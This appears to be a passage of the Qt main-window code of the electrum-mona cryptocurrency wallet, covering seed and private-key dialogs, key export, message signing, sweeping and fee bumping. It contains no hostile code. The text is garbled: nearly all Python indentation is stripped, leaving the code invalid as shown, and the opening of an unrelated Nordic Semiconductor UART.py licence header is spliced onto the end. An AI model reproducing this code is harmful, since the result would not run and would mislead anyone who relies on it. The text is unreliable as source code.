self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
if self.wallet.has_lightning():
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
sb.addPermanentWidget(self.lightning_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_mona.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def disable_lightning(self):
warning = _('This will delete your lightning private keys')
r = self.question(_('Disable Lightning payments?') + '\n\n' + warning)
if not r:
return
self.wallet.remove_lightning()
self.show_warning(_('Lightning keys have been removed. This wallet will be closed'))
self.close()
def enable_lightning(self):
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
r = self.question(_('Enable Lightning payments?') + '\n\n' + _('WARNINGS') + ': ' + '\n\n' + warning1 + '\n\n' + warning2)
if not r:
return
self.wallet.init_lightning()
self.show_warning(_('Lightning keys have been initialized. This wallet will be closed'))
self.close()
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
if self.wallet.has_lightning():
lightning_b = QPushButton(_('Disable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.disable_lightning)
lightning_label = QLabel(_('Enabled'))
lightning_b.setDisabled(bool(self.wallet.lnworker.channels))
#else:
#lightning_b = QPushButton(_('Enable'))
#lightning_b.clicked.connect(dialog.close)
#lightning_b.clicked.connect(self.enable_lightning)
#lightning_label = QLabel(_('Disabled'))
#grid.addWidget(QLabel(_('Lightning')), 5, 0)
#grid.addWidget(lightning_label, 5, 1)
#grid.addWidget(lightning_b, 5, 2)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
# only show the combobox if multiple master keys are defined
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
btns = run_hook('wallet_info_buttons', self, dialog) or Buttons(CloseButton(dialog))
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt) -> Optional[Transaction]:
from electrum_mona.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
from electrum_mona import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("monacoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_mona import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-mona-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(repr(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.storage.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: Transaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
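        # Worked example with illustrative numbers: for total_size = 300 bytes,
        # fee_per_kb = 10000 sat/kB and parent_fee = 1000 sat, the child pays
        # 10000 * 300 / 1000 - 1000 = 2000 sat, clamped to [total_size, max_fee].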
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
            self.show_error(f'''{_("Can't CPFP")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
# new_tx.set_rbf(True)
new_tx.set_rbf(False)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate)
except CannotBumpFee as e:
self.show_error(str(e))
return
#if is_final:
# new_tx.set_rbf(True)
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
UART.py
|
# Copyright (c) 2017, Nordic Semiconductor ASA
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. Neither the name of Nordic Semiconductor ASA nor the names of
# its contributors may be used to endorse or promote products
# derived from this software without specific prior written
